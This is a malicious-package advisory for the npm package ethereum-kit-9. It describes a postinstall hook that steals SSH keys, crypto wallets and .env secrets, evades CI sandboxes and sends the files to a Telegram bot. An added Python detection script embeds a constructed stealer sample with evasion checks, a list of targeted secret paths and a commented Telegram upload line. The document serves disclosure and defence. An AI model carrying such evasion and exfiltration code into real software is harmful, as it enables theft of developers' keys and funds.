MAL-2026-5356

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ethereum-kit-9/MAL-2026-5356.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5356
Published
2026-06-09T07:55:35Z
Modified
2026-06-11T02:31:32.056543802Z
Summary
Malicious code in ethereum-kit-9 (npm)
Details

Crypto/SSH/wallet stealer, sibling of the blockchain-helper-0 campaign (c960+). A postinstall hook auto-executes src/index.js, which harvests ~/.ssh/id_rsa and id_ed25519, Solana/Ethereum/BTC/Tron/Sui/Aptos wallets, .env files and seed phrases, self-labels as "CRYPTO STEALER", and exfiltrates to the SAME Telegram bot 8227918239, chat 6433587894 (not rotated). The campaign now uses an inflated version number (1.25.36) rather than 1.0.0.


-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (fca6873d6bb09703d4ceba095e845845ec40ca4274def05870ed6d59b90fdf6a)

On npm install, the package's postinstall hook loads src/index.js, which after a short delay and a sandbox/CI evasion check enumerates the installer's home and project directories for sensitive files and uploads each one to api.telegram.org using a hardcoded bot token and chat_id. Targeted paths include SSH private keys (~/.ssh/id_rsa, id_ed25519), crypto wallet keystores and data directories for Solana, Ethereum (~/.ethereum/keystore), Bitcoin, Tron, Sui, and Aptos, and project secrets (.env, .env.local, mnemonic.txt, seed.txt, wallet.json, private.key, secrets.json). The payload skips execution when CI/sandbox indicators are present (CI=true, GITHUB_ACTIONS, NODE_ENV=test/development, usernames like runner/sandbox/docker/jenkins, and 12-hex-char container hostnames) to evade analysis. The package name and generic 'Utility library' description with placeholder author impersonate Ethereum tooling to lure developers.
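As an added example (not code from this advisory, the OSSF malicious-packages repository, or the package itself), the following Python script turns the behaviour described above into a static triage check: it flags install-time lifecycle hooks in package.json, looks in the entry script for the Telegram exfiltration host, bot-token-shaped strings, the known bot/chat IDs, quoted references to the targeted secret paths, and the CI/sandbox evasion checks, and compares file and tarball hashes against the evidence hashes this advisory lists. The sample package.json and entry script are constructed to mirror the description and are not the real payload; the token value is a placeholder with only the shape of a bot token.

```python
"""Static triage of an npm package's contents against the behaviour described in
MAL-2026-5356 (added example; not code from the advisory or from OSSF).
The sample package below is constructed for illustration, not the real payload."""
import base64
import hashlib
import json
import re

# Network and campaign indicators taken from the advisory text.
TELEGRAM_HOST = "api.telegram.org"
KNOWN_BOT_ID = "8227918239"
KNOWN_CHAT_ID = "6433587894"
# Hashes listed in the advisory's indicators block.
EVIDENCE_SHA256 = {
    "src/index.js": "c43afad949027040c6414d26fa4eea6e2671d2572f9df7fd595e12baf204854f",
    "package.json": "e3eba8520925dea0013f70f2928d2e3394d338710bc158b0b992d952d655bb55",
}
ADVISORY_SRI = ("sha512-U6YW4vR9XhYaZAd2vEcz3c9FD2yriVYv1fFP8SW4iwyI+FZWHMgrmQmJhy6lTRsdr"
                "crZfQ/tdkpUqSqXRNJdCQ==")

# Shape of a Telegram bot token: numeric bot id, colon, 35-character secret.
BOT_TOKEN_RE = re.compile(r"\b(\d{8,12}):[A-Za-z0-9_-]{35}\b")
# Quoted path literals the advisory says the payload targets.
Q = "[\"']"
SENSITIVE_PATH_RE = re.compile(
    Q + r"(\.ssh/id_rsa|\.ssh/id_ed25519|\.ethereum/keystore|\.env(?:\.local)?"
    r"|mnemonic\.txt|seed\.txt|wallet\.json|private\.key|secrets\.json)" + Q)
# Sandbox/CI evasion checks the advisory describes.
EVASION_PATTERNS = (
    ("ci_env", re.compile(r"process\.env\.(?:CI|GITHUB_ACTIONS)\b")),
    ("node_env", re.compile(r"process\.env\.NODE_ENV\b")),
    ("hostname_check", re.compile(r"os\.hostname\(\)")),
    ("docker_hostname_regex", re.compile(r"\[0-9a-f\]\{12\}")),
    ("username_check", re.compile(r"os\.userInfo\(\)|process\.env\.(?:USER|USERNAME)\b")),
)


def lifecycle_hooks(package_json: str) -> list:
    """Lifecycle scripts that npm runs automatically at install time."""
    scripts = json.loads(package_json).get("scripts", {})
    return [k for k in ("preinstall", "install", "postinstall") if k in scripts]


def triage(package_json: str, entry_source: str) -> dict:
    """Collect indicators; 'suspicious' is set when an install hook is combined
    with an exfiltration channel or secret-harvesting paths."""
    findings = {}
    hooks = lifecycle_hooks(package_json)
    if hooks:
        findings["lifecycle_hooks"] = hooks
    if TELEGRAM_HOST in entry_source:
        findings["telegram_exfil"] = True
    bot_ids = sorted(set(BOT_TOKEN_RE.findall(entry_source)))
    if bot_ids:
        findings["bot_ids"] = bot_ids
    if KNOWN_BOT_ID in entry_source or KNOWN_CHAT_ID in entry_source:
        findings["known_campaign_ids"] = True
    paths = sorted(set(SENSITIVE_PATH_RE.findall(entry_source)))
    if paths:
        findings["sensitive_paths"] = paths
    evasion = [name for name, rx in EVASION_PATTERNS if rx.search(entry_source)]
    if evasion:
        findings["evasion_markers"] = evasion
    findings["suspicious"] = bool(hooks) and (
        "telegram_exfil" in findings or "sensitive_paths" in findings)
    return findings


def matches_evidence(path: str, data: bytes) -> bool:
    """True if a file's SHA-256 equals the advisory's evidence hash for that path."""
    return hashlib.sha256(data).hexdigest() == EVIDENCE_SHA256.get(path)


def sri_sha512(tarball: bytes) -> str:
    """npm-style Subresource Integrity string (as found in package-lock.json)."""
    return "sha512-" + base64.b64encode(hashlib.sha512(tarball).digest()).decode()


def matches_advisory_tarball(tarball: bytes) -> bool:
    return sri_sha512(tarball) == ADVISORY_SRI


# Constructed sample mirroring the advisory's description; not the real package.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "ethereum-kit-9", "version": "1.25.36", "description": "Utility library",
    "author": "developer", "main": "src/index.js",
    "scripts": {"postinstall": "node src/index.js"},
})
FAKE_TOKEN = KNOWN_BOT_ID + ":" + "A" * 35  # token shape only; not a real secret
SAMPLE_ENTRY = """
const os = require("os");
if (process.env.CI === "true" || process.env.GITHUB_ACTIONS) process.exit(0);
if (["test", "development"].includes(process.env.NODE_ENV)) process.exit(0);
if (/^[0-9a-f]{12}$/.test(os.hostname())) process.exit(0);  // default Docker hostname
const TOKEN = "__TOKEN__", CHAT_ID = "6433587894";
const targets = [".ssh/id_rsa", ".ssh/id_ed25519", ".ethereum/keystore", ".env", "seed.txt"];
setTimeout(() => { /* POST each target to https://api.telegram.org/bot${TOKEN}/sendDocument?chat_id=${CHAT_ID} */ }, 3000);
""".replace("__TOKEN__", FAKE_TOKEN)

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_PACKAGE_JSON, SAMPLE_ENTRY), indent=2))
```

To use it on a real download, run `npm pack <name>@<version>` (or take the tarball out of the npm cache), feed the raw tarball bytes to `matches_advisory_tarball`, and feed the extracted package.json and entry script to `triage` and `matches_evidence`. The regex-based checks are deliberately narrow (quoted path literals, `process.env.*` reads, the 12-hex-char hostname test) so that they do not fire on ordinary `process.env` usage; a package that reaches `suspicious` should be treated as an incident, with the SSH keys, wallet material and .env secrets of the installing machine considered exposed.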

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-005351",
            "import_time": "2026-06-11T02:24:27.113320556Z",
            "sha256": "fca6873d6bb09703d4ceba095e845845ec40ca4274def05870ed6d59b90fdf6a",
            "source": "amazon-inspector",
            "modified_time": "2026-06-11T01:39:32Z",
            "versions": [
                "1.25.36"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / ethereum-kit-9

Package

Affected ranges

Type
SEMVER
Events
Introduced
0 (unknown introduced version / all previous versions are affected)

Affected versions

1.*
1.25.36

Database specific

cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "src/index.js",
            "sha256": "c43afad949027040c6414d26fa4eea6e2671d2572f9df7fd595e12baf204854f",
            "tlsh": "36b121f40ee677148193e3a9624f60015436e1473c06ed65769c83c8af89a2ca6f2efc"
        },
        {
            "path": "package.json",
            "sha256": "e3eba8520925dea0013f70f2928d2e3394d338710bc158b0b992d952d655bb55",
            "tlsh": "f1d0a7200f10977335c48a6e0866510a6ab10e0f5048bc1417f72158838abf648be61e"
        }
    ],
    "package_integrity": [
        {
            "filename": "ethereum-kit-9-1.25.36.tgz",
            "hashes": {
                "sha512_sri": "sha512-U6YW4vR9XhYaZAd2vEcz3c9FD2yriVYv1fFP8SW4iwyI+FZWHMgrmQmJhy6lTRsdrcrZfQ/tdkpUqSqXRNJdCQ==",
                "sha1": "fdf7ed482eaefd5219020cd370d1a43ea5c46da9"
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ethereum-kit-9/MAL-2026-5356.json"